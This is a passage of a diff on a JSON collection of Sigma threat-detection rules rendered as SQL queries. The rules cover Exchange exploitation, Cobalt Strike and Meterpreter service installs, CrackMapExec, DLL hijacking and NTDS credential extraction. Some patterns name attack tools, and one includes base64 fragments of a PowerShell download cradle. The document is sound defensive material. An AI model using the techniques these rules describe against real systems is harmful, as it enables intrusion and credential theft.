"09570ae5-889e-43ea-aac0-0e1221fb3d95", - "status": "test", - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" - ], - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" - }, - { - "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", - "status": "experimental", - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "author": "Florian Roth (Nextron Systems), @testanull", - "tags": [ - "attack.lateral_movement", - "attack.t1210" - ], - "falsepositives": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" - ], - "filename": "win_exchange_cve_2021_42321.yml" - }, - { - "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "id": "9db37458-4df2-46a5-95ab-307e7f29e675", - "status": "test", - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "author": "Jose Rodriguez @Cyb3rPandaH", - "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\')" ], - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" + "filename": "file_event_win_ntds_exfil_tools.yml" }, { - "title": "Failed MSExchange Transport Agent Installation", - "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", - "status": "experimental", - "description": "Detects a failed installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "title": "New Outlook Macro Created", + "id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", + "status": "test", + "description": "Detects the creation of a macro file for Outlook.", + "author": "@ScoubiMtl", "tags": [ "attack.persistence", - "attack.t1505.002" + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "User genuinely creates a VB Macro for their email" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\')" ], - "filename": "win_exchange_transportagent_failed.yml" + "filename": "file_event_win_office_outlook_macro_creation.yml" }, { - "title": "MSExchange Transport Agent Installation - Builtin", - "id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", - "status": "test", - "description": "Detects the Installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Suspicious Files in Default GPO Folder", + "id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", + "status": "experimental", + "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", + "author": "elhoim", "tags": [ - "attack.persistence", - "attack.t1505.002" + "attack.t1036.005", + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND logs MATCH ('\"Install-TransportAgent\"'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Policies\\\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" ], - "filename": "win_exchange_transportagent.yml" + "filename": "file_event_win_susp_default_gpo_dir_write.yml" }, { - "title": "File Was Not Allowed To Run", - "id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", + "title": "Powerup Write Hijack DLL", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", "status": "test", - "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", - "author": "Pushkarev Dmitry", + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "author": "Subhash Popuri (@pbssubhash)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.006", - "attack.t1059.007" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "Need tuning applocker or add exceptions in SIEM" + "Any powershell script that creates bat files" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-AppLocker/MSI and Script', 'Microsoft-Windows-AppLocker/EXE and DLL', 'Microsoft-Windows-AppLocker/Packaged app-Deployment', 'Microsoft-Windows-AppLocker/Packaged app-Execution') AND EventID IN ('8004', '8007', '8022', '8025'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" ], - "filename": "win_applocker_file_was_not_allowed_to_run.yml" + "filename": "file_event_win_hktl_powerup_dllhijacking.yml" }, { - "title": "OpenSSH Server Listening On Socket", - "id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", - "status": "experimental", - "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", - "author": "mdecrevoisier", + "title": "Suspicious desktop.ini Action", + "id": "81315b50-6b60-4d8f-9928-3466e1022515", + "status": "test", + "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", "tags": [ - "attack.lateral_movement", - "attack.t1021.004" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Legitimate administrator activity" + "Operations performed through Windows SCCM or equivalent", + "Read only access list authority" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4' AND process = 'sshd' AND payload LIKE 'Server listening on %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\desktop.ini' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\JetBrains\\\\Toolbox\\\\bin\\\\7z.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\JetBrains\\\\apps\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\')))" ], - "filename": "win_sshd_openssh_server_listening_on_socket.yml" + "filename": "file_event_win_susp_desktop_ini.yml" }, { - "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "title": "TeamViewer Remote Session", + "id": "162ab1e4-6874-4564-853c-53ec3ab8be01", "status": "test", - "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "description": "Detects the creation of log files during a TeamViewer remote session", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate uses of TeamViewer in an organisation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\TeamViewer\\\\RemotePrinting\\\\tvprint.db' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TeamViewer\\\\TVNetwork.log' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\TeamViewer%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Logfile.log%' ESCAPE '\\'))" ], - "filename": "win_dns_server_susp_server_level_plugin_dll.yml" + "filename": "file_event_win_susp_teamviewer_remote_session.yml" }, { - "title": "NetSupport Manager Service Install", - "id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", + "title": "OneNote Attachment File Dropped In Suspicious Location", + "id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", "status": "experimental", - "description": "Detects NetSupport Manager service installation on the target system.", + "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of the tool" + "Legitimate usage of \".one\" or \".onepkg\" files from those locations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%\\\\NetSupport Manager\\\\client32.exe%' ESCAPE '\\' OR ServiceName = 'Client32'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.one' ESCAPE '\\' OR TargetFilename LIKE '%.onepkg' ESCAPE '\\'))" ], - "filename": "win_system_service_install_netsupport_manager.yml" + "filename": "file_event_win_office_onenote_files_in_susp_locations.yml" }, { - "title": "Suspicious Service Installation Script", - "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", + "title": "Drop Binaries Into Spool Drivers Color Folder", + "id": "ce7066a6-508a-42d3-995b-2952c65dc2ce", "status": "experimental", - "description": "Detects suspicious service installation scripts", - "author": "pH-T (Nextron Systems)", + "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\'))" ], - "filename": "win_system_susp_service_installation_script.yml" + "filename": "file_event_win_susp_spool_drivers_color_drop.yml" }, { - "title": "Local Privilege Escalation Indicator TabTip", - "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "title": "RDP File Creation From Suspicious Application", + "id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "status": "experimental", - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Rclone config file being created", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Whale.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Discord.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Keybase.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msteams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Slack.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\teams.exe' ESCAPE '\\') AND TargetFilename LIKE '%.rdp%' ESCAPE '\\')" ], - "filename": "win_system_lpe_indicators_tabtip.yml" + "filename": "file_event_win_rdp_file_susp_creation.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", - "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "status": "experimental", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "status": "test", + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.t1068" ], "falsepositives": [ - "Highly unlikely" + "Unknown", + "Possibly some Microsoft Edge upgrades" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" ], - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" }, { - "title": "KrbRelayUp Service Installation", - "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "status": "experimental", - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "author": "Sittikorn S, Tim Shelton", + "title": "Moriya Rootkit", + "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "status": "test", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\'" ], - "filename": "win_system_krbrelayup_service_installation.yml" + "filename": "file_event_win_moriya_rootkit.yml" }, { - "title": "NTFS Vulnerability Exploitation", - "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "status": "test", - "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "title": "CrackMapExec File Creation Patterns", + "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "status": "experimental", + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1499.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_system_ntfs_vuln_exploit.yml" + "filename": "file_event_win_crackmapexec_patterns.yml" }, { - "title": "Windows Defender Threat Detection Disabled - Service", - "id": "6c0a7755-6d31-44fa-80e1-133e57752680", - "status": "stable", - "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled", - "author": "Ján Trenčanský, frack113", + "title": "Dynamic CSharp Compile Artefact", + "id": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", + "status": "test", + "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027.004" ], "falsepositives": [ - "Administrator actions", - "Auto updates of Windows Defender causes restarts" + "Unknown" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7036' AND Provider_Name = 'Service Control Manager' AND param1 IN ('Windows Defender Antivirus Service', 'Service antivirus Microsoft Defender') AND param2 = 'stopped')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%.cmdline' ESCAPE '\\'" ], - "filename": "win_system_defender_disabled.yml" + "filename": "file_event_win_csharp_compile_artefact.yml" }, { - "title": "CobaltStrike Service Installations - System", - "id": "5a105d34-05fc-401e-8553-272b45c1522d", + "title": "Files With System Process Name In Unsuspected Locations", + "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Unknown" + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE 